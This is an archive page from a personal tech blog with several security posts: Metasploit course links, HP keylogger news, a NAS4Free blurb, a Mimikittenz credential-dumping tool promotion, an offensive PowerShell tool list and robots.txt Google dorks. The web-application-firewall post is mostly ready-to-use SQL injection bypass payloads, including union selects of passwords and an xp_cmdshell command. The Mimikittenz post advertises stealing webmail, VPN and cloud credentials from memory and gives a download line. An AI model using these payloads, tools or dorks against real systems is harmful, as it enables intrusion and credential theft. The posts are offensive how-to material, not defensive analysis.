All Teched UP! | Caintech.co.uk

Archive for the ‘All Teched UP!’ Category

10 Best Free Metaspoilt Penetration Testing Courses & Video Tutorials

Posted: 25/01/2019 in All Teched UP!, free stuff, Hacking, Vulnerability
Tags: metasploit

Metaspoilt is one of the most popular penetration testing frameworks. This is an opensource framework that also has a paid and supported enterprise version.
Metaspoilt is a preferred choice of penetration testers, ethical hackers, and security engineers worldwide.
Penetration testing is the first step in information security and ethical hacking field to identify vulnerabilities in any software.

Want to learn ethical hacking? This tool is a good starting point for you get started into the field of hacking and information security.

What Is Penetration Testing?

Penetration testing is a simple way to identify vulnerabilities in any software. This is commonly referred to as pen testing.

Penetration testing is performed by simulating an attack to exploit vulnerabilities in software. Usually, many different attacks are performed in a pen test and results are recorded in the form of a report.

Typically, a pen test report contains a list of all the vulnerabilities that were exploited and recommended actions to rectify those vulnerabilities.

A pen testers job is to run a variety of pen tests on a different kind of software to identify and report vulnerabilities before anyone exploits it.

Why Learn Metaspoilt?

Metaspoilt is a tool that is commonly used by ethical hackers for doing penetration testing. I think, below are some key reasons Metaspoilt is a tool worth learning.

The framework has the community support that makes it efficient in detecting vulnerabilities.
Its open source license makes the use and contribution easy.
It is well documented and help is easily available.

Metaspoilt Courses and Video Tutorials

Penetration Testing Tutorials For Beginners – YouTube – This is a hand-curated playlist on Youtube by me. This list contains simple beginners tutorials that can help you learn penetration testing using Metaspoilt.
Hands-On Penetration Testing with Metasploit tutorial – YouTube – This is a small course focused on doing simple penetration testing using Metasploit
Ethical Hacking & Penetration Testing – Complete Course – YouTube – This is a full course that contains many aspects of ethical hacking along with penetration testing using Metaspoilt.
Web Application Penetration Testing – YouTube – This course by TutorialsPoint covers web application penetration testing using various tools like NMAP, Metaspoilt and more.
Complete Kali Linux Tutorial For Ethical Hacking (Web Application Penetration Testing in Kali Linux) – YouTube – This tutorial is focused on penetration testing using Kali Linux and various tools including Metasploit.
Ethical Hacking with Metasploit the Penetration testing Tool – YouTube – Learn to become a hacker using Metaspoilt penetration testing with this course.
Metasploit Course 2018 – YouTube – A simple 2-hour course from an expert Metaspoilt user.
Introduction to Metasploit for Penetration Testing – YouTube – Another short course to learn Metaspoilt penetration testing and ethical hacking.
Beginning Metasploit tutorial – YouTube – A very short beginners tutorial by Packtpub on Metasploit.
Web App Penetration Testing – YouTube – This course on youtube is focused on doing web application pen testing.

Summary

Metaspoilt is a framework that you can learn quickly and start using for penetration testing. It is very popular and the tutorials are easily available. I hope you find this list useful to learn penetration testing.

Keylogger Found On Over 460 HP Laptop Models

Posted: 09/12/2017 in All Teched UP!, Geek Stuff, Hacking
Tags: HP, keylogger

HP has an awful history of ‘accidentally’ leaving keyloggers onto its customers’ laptops. At least two times this year, HP laptops were caught with pre-installed keylogger or spyware applications.
A tweet made by a security researcher claiming to have found a built-in keylogger in several HP laptops, and now he went public with his findings.

A security researcher who goes by the name of ZwClose discovered a keylogger in several Hewlett-Packard (HP) laptops that could allow hackers to record your every keystroke and steal sensitive data, including passwords, account information, and credit card details.

The Keylogger was found embedded in the SynTP.sys file, a part of Synaptics touchpad driver that ships with HP notebook computers, leaving more than 460 HP Notebook models vulnerable to hackers.

Although the keylogger component is disabled by default, hackers can make use of available open source tools for bypassing User Account Control (UAC) to enable built-in keylogger “by setting a registry value.”

Here’s the location of the registry key:

HKLM\Software\Synaptics\%ProductName%
HKLM\Software\Synaptics\%ProductName%\Default

The researcher reported the keylogger component to HP last month, and the company acknowledges the presence of keylogger, saying it was actually “a debug trace” which was left accidentally, but has now been removed.

“A potential security vulnerability has been identified with certain versions of Synaptics touchpad drivers that impact all Synaptics OEM partners,” HP says in its advisory, calling the keylogger as a potential, local loss of confidentiality.

“A party would need administrative privileges in order to take advantage of the vulnerability. Neither Synaptics nor HP has access to customer data as a result of this issue.”

The company has released a Driver update for all the affected HP Notebook Models. If you own an HP laptop, you can look for updates for your model. The list of affected HP notebooks can be found at the HP Support website.

This is not the first time a keylogger has been detected in HP laptops. In May 2017, a built-in keylogger was found in an HP audio driver that was silently recording all of its users’ keystrokes and storing them in a human-readable file.

NAS4Free – Open Source Network Storage System

Posted: 26/11/2017 in All Teched UP!, free stuff
Tags: free stuff, NAS

The NAS4Free operating system can be installed on virtually any hardware platform to share computer data storage over a computer network. ‘NAS’ as in “Network-Attached Storage” and ‘4Free’ as in ‘Free and open source’, NAS4Free is the simplest and fastest way to create a centralized and easily-accessible server for all kind of data!

NAS4Free supports sharing across Windows, Apple, and UNIX-like systems. It includes ZFS, Software RAID (0,1,5), disk encryption, S.M.A.R.T / email reports etc. with following protocols/services: CIFS/SMB (samba), Samba AD, FTP, NFS v4, TFTP, AFP, RSYNC, Unison, iSCSI, UPnP, Bittorent, Syncthing, VirtualBox and noVNC, Bridge, CARP (Common Address Redundancy Protocol) and HAST (Highly Available Storage).

This all can easy be managed by a configurable web interface.

Features
Backup
NAS
File Server

Website: https://www.nas4free.org

Mimikittenz: Extracting Info From Memory

Posted: 23/11/2017 in All Teched UP!, Hacking
Tags: mimicatz, mimikittenz, Powershell

So why do we restrict Powershell to users in an organisation, well the answer is Mimikittenz.

Mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes.
mimikittenz can also easily extract other kinds of juicy info from target processes using regex patterns including but not limited to:

TRACK2 (CreditCard) data from merchant/POS processes
PII data
Encryption Keys & All the other goodstuff

NOTE: This tool is targeting running process memory address space, once a process is killed it’s memory ‘should’ be cleaned up and inaccessible however there are some edge cases in which this does not happen.

The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction in order to maximise post exploitation efforts and increase value of information gathered per target.
Currently mimikittenz is able to extract the following credentials from memory:

The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction in order to maximise post exploitation efforts and increase value of information gathered per target.

Currently mimikittenz is able to extract the following credentials from memory:

#####Webmail#####

Gmail
Office365
Outlook Web
#####Accounting#####

Xero
MYOB
#####Remote Access#####

Juniper SSL-VPN
Citrix NetScaler
Remote Desktop Web Access 2012
#####Developement#####

Jira
Github
Bugzilla
Zendesk
Cpanel
#####IHateReverseEngineers#####

Malwr
VirusTotal
AnubisLabs
#####Misc#####

Dropbox
Microsoft Onedrive
AWS Web Services
Slack
Twitter
Facebook

Download
git clone https://github.com/putterpanda/mimikittenz.git
https://github.com/putterpanda/mimikittenz.git

Also read: Unofficial Guide to Mimikatz & Command Reference

9 ways to bypass Web Application Firewall with SQL injection

Posted: 10/09/2017 in All Teched UP!, Geek Stuff, Hacking
Tags: sql, WAF

A web application firewall (or WAF) filters, monitors, and blocks HTTP traffic to and from a web application. A WAF is differentiated from a regular firewall in that a WAF is able to filter the content of specific web applications while regular firewalls serve as a safety gate between servers. By inspecting HTTP traffic, it can prevent attacks stemming from web application security flaws, such as SQL injection, cross-site scripting (XSS), file inclusion, and security mis-configurations.

How WAF work?

Exception Detection Protocol: Denies requests that do not meet HTTP standards
Enhanced input validation: Proxy and server-side validation, not just client-side validation
WhiteList & Blacklist
Rule-based and exception-based protection: more black-based mechanisms based on rules, more flexible based on exceptions
State management: focus on session protectionThere are also: Cookies protection, anti-intrusion avoidance technology, response monitoring and information disclosure protection.

How to bypass WAF

Mixed CaseChange case of malicious input triggering WAF protections. union may become uNIoN, If the WAF is using a case sensitive blacklist, changing case may bypass that filter.
```
http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4
```
Replace the keyword(Insert special characters that will be removed by WAF) – SELECT may become SEL<ECT which would be passed on as SELECT once the offending character is removed.
```
http://target.com/index.php?page_id=-15&nbsp;UNIunionON SELselectECT 1,2,3,4
```

Encode
+ URL encode

page.php?id=1%252f%252a*/UNION%252f%252a /SELECT

+Hex encode

target.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4…
 
　　　SELECT(extractvalue(0x3C613E61646D696E3C2F613E,0x2f61))

+Unicode encode

?id=10%D6‘%20AND%201=2%23　　
 
　　　SELECT 'Ä'='A'; #1

Use comments
Insert comments in middle of attack strings. For instance, /*!SELECT*/ might be overlooked by the WAF but passed on to the target application and processed by a mysql database.

index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4　　　
 
　　　'union%a0select pass from users#

index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3
 
　　　?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4…

Equivalent functions and commands
Some functions or commands can not be used because this keywords are detected, but in many cases we can be used with equivalent or similar code of them.

hex()、bin() ==> ascii()
 
sleep() ==>benchmark()
 
concat_ws()==>group_concat()
 substr((select 'password'),1,1) = 0x70
 
　　　strcmp(left('password',1), 0x69) = 1
 
　　   strcmp(left('password',1), 0x70) = 0
 
　　　strcmp(left('password',1), 0x71) = -1
mid()、substr() ==> substring()
 
@@user ==> user()
 
@@datadir ==> datadir()

Special symbolsHere I have non-alphanumeric characters in the special symbols of a class, special symbols have a special meaning and usage.
+ ` symbol: select `version()`;
+ +- :select+id-1+1.from users;
+ @:select@^1.from users;
+Mysql function() as xxx
+`、~、!、@、%、()、[]、.、-、+ 、|、%00
Example:
```
‘se’+’lec’+’t’
 
　　　　　　%S%E%L%E%C%T 1
 
　　　　　　1.aspx?id=1;EXEC(‘ma’+'ster..x’+'p_cm’+'dsh’+'ell ”net user”’)

' or --+2=- -!!!'2
 
 　　　 id=1+(UnI)(oN)+(SeL)(EcT)
```
HTTP parameter controlSupply multiple parameter= value sets of the same name to confuse the WAF. Given the example http://example.com?id=1&?id=’ or ‘1’=’1′ — ‘ in some circumstances such as with Apache/PHP, the application will only parse the last (second) instance of id= while the WAF only parses the first. It appears to be a legitimate request but the application still receives and process malicious input. Most WAF’s today are not vulnerable to HTTP Parameter Pollution (HPP) but it is still worth a try when building bypasses.
+ HPP (HTTP Parameter Polution)
```
/?id=1;select+1,2,3+from+users+where+id=1—
 
　　　/?id=1;select+1&amp;id=2,3+from+users+where+id=1—
 
　　　/?id=1/**/union/*&amp;id=*/select/*&amp;id=*/pwd/*&amp;id=*/from/*&amp;id=*/users
```
HPP is also known as repeated parameter contamination, the simplest is: uid = 1 & uid = 2 & uid = 3, for this case, different Web server processing as follows:

+HPF (HTTP Parameter Fragment)

This method is HTTP segmentation injection, similar to CRLF (using control characters% 0a,% 0d, etc. to perform line breaks)
```
/?a=1+union/*&amp;b=*/select+1,pass/*&amp;c=*/from+users--
 
　　select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users—
```
+HPC (HTTP Parameter Contamination)
RFC2396 defines the following characters:
```
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @ &amp; = + $ ,
Unwise : { } | \ ^ [ ] `
```
Different Web server processing processes have different logic when constructing special requests:

In the case of the magic character %, Asp / Asp.net will be affected
Buffer overflowWAF’s are, afterall, applications and vulnerable to the same software flaws as any other application. If a buffer overflow condition can create a crash, even if it does not result in code execution, this may result in a WAF failing open. In other words, a bypass.
```
?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
```

IntegrationIntegration means the use of a variety of bypass technology, a single technology may not be able to bypass the filtering mechanism, but the use of a variety of technologies with the possibility of success will increase a lot.

target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4…
 
id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()– -
 
?id=-725+/*!UNION*/+/*!SELECT*/+1,GrOUp_COnCaT(COLUMN_NAME),3,4,5+FROM+/*!INFORMATION

Powershell Tools For Pentester

Posted: 02/05/2017 in All Teched UP!, Hacking, Pentest, Powershell
Tags: Pentest, Powershell

PowerMemory: https://github.com/giMini/PowerMemory
Exploit the credentials present in files and memory
ReflectiveDLLInjection: https://github.com/stephenfewer/ReflectiveDLLInjection
Reflective DLL injection is a library injection technique that is primarily used to perform the loading of a library from memory to host processes. The library should therefore be able to load itself by implementing a minimal PE file loader, managed with minimal interaction between the host system and processes.
ThrowbackLP: https://github.com/silentbreaksec/ThrowbackLP
Monitor station reverse injection
Throwback: https://github.com/silentbreaksec/Throwback
HTTP/S Beaconing Implant
CrackMapExec: https://github.com/byt3bl33d3r/CrackMapExec
A swiss army knife for pentesting Windows/Active Directory environments
nishang: https://github.com/samratashok/nishang
Nishang is a PowerShell-based penetration testing tool. Integration of frameworks, scripts and various payloads. These scripts are written by Nishang’s author in the real penetration testing process, with actual combat value. Including the download and execution, keyboard records, dns, delay commands and other scripts.
UnmanagedPowerShell: https://github.com/leechristensen/UnmanagedPowerShell
Executes PowerShell from an unmanaged process. With a few modifications, these same techniques can be used when injecting into different processes (i.e. you can cause any process to execute PowerShell if you want).
Empire: https://github.com/powershellempire/empire
Empire is a PowerShell and Python post-exploitation agent. http://www.powershellempire.com/
Unicorn: https://github.com/trustedsec/unicorn
Unicorn is a simple tool for PowerShell downgrade attacks and direct injection of shellcode into memory.
PowerShell: https://github.com/clymb3r/PowerShell
The tools in this directory are part of PowerSploit and are being maintained there. They are preserved here for legacy, but any bug fixes should be checked in to PowerSploit.
PSRecon: https://github.com/gfoss/PSRecon
PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.
PowerShell: https://github.com/MikeFal/PowerShell
Powershell scripts for SQL Server database administration
PowerTools Tools: https//github.com/PowerShellEmpire/PowerTools

PowerTools is a collection of PowerShell projects with a focus on offensive operations.
PowerShellArsenal: https://github.com/mattifestation/PowerShellArsenal
PowerShell module for reverse engineering, can be disassembled hosting and unmanaged code, for. NET malware analysis, analysis of memory, parsing file formats and memory structure, access to internal system information.
PowerShell API Manual: http://www.pinvoke.net/
PInvoke.net is primarily a wiki that allows developers to find, edit, and add PInvoke’s * signatures, user-defined types, and any other information associated with calling managed code for Win32 and other unmanaged APIs.
The AD-Recon-PowerShell: https://github.com/PyroTek3/PowerShell-AD-Recon
A useful PowerShell script
The PowerCat: https://github.com/secabstraction/PowerCat
PowerShell TCP / IP Swiss Army Knife for Netcat & Ncat.
Honeyport: https://github.com/Pwdrkeg/honeyport
A PowerShell script for creating Windows honeyport
PowerShellMafia: https://github.com/PowerShellMafia/PowerSploit
PowerSploit is the set of PowerShell modules in Microsoft that can help Infiltrators evaluate at all stages.
Secmod-Posh: https://github.com/darkoperator/Posh-SecMod
PowerShell Module with Security cmdlets for security work
Harness: https://github.com/Rich5/Harness
Interactive remote PowerShell Payload

Your Robots.txt File Helps Hackers

Posted: 29/04/2017 in All Teched UP!, Hacking
Tags: robots.txt, websites

As you know, the majority of the webmasters upload a file called robots.txt to their servers in order to give instructions to the crawlers like Google, Yahoo, Bing… about what pages mustn’t be indexed.
Example:

Why does the webmaster want to hide some URLs? One of the first things the hackers can do is check these files. Hackers can get a lot of valuable information trying to locate the data, scripts… that the webmaster wants to keep hiding…

Sometimes Google indexes the robots.txt, giving hackers the oportunity to locate words in this file through Google searches.

For example, if a hacker wants to locate users installations, he could use the robots.txt files indexed in Google to locate them and then try to exploit them.

inurl:.kh/robots.txt- + “Disallow: /user/ “

The hackers could locate WordPress installations by using…

inurl:”.com/robots.txt” + “Disallow: /wp-admin/

The hackers could locate Joomla installations by using…

inurl:”/robots.txt” + “Disallow: joomla”

The hackers could locate Plesk Statisticsin stallations by using…

inurl:”/robots.txt” + “Disallow: plesk-stat”

The hackers could locate Drupal installations by using…inurl:”.com/robots.txt” + “Disallow: ?q=admin”
The hackers could locate Tinymce installations in order to try to get information about the plugins installed on these servers and then try to exploit them…
inurl:”.com/robots.txt” + “Disallow: tinymce”
Is someone trying to hide their password?.
inurl:”/robots.txt” + “Disallow: passwords.txt”>You should be careful when you are writing your robots.txt because if someone checks it or someone with imagination searches on Google with this types of queries, you could be a hacker’s target…

Caintech.co.uk

Like us on Facebook….

Follow Blog via Email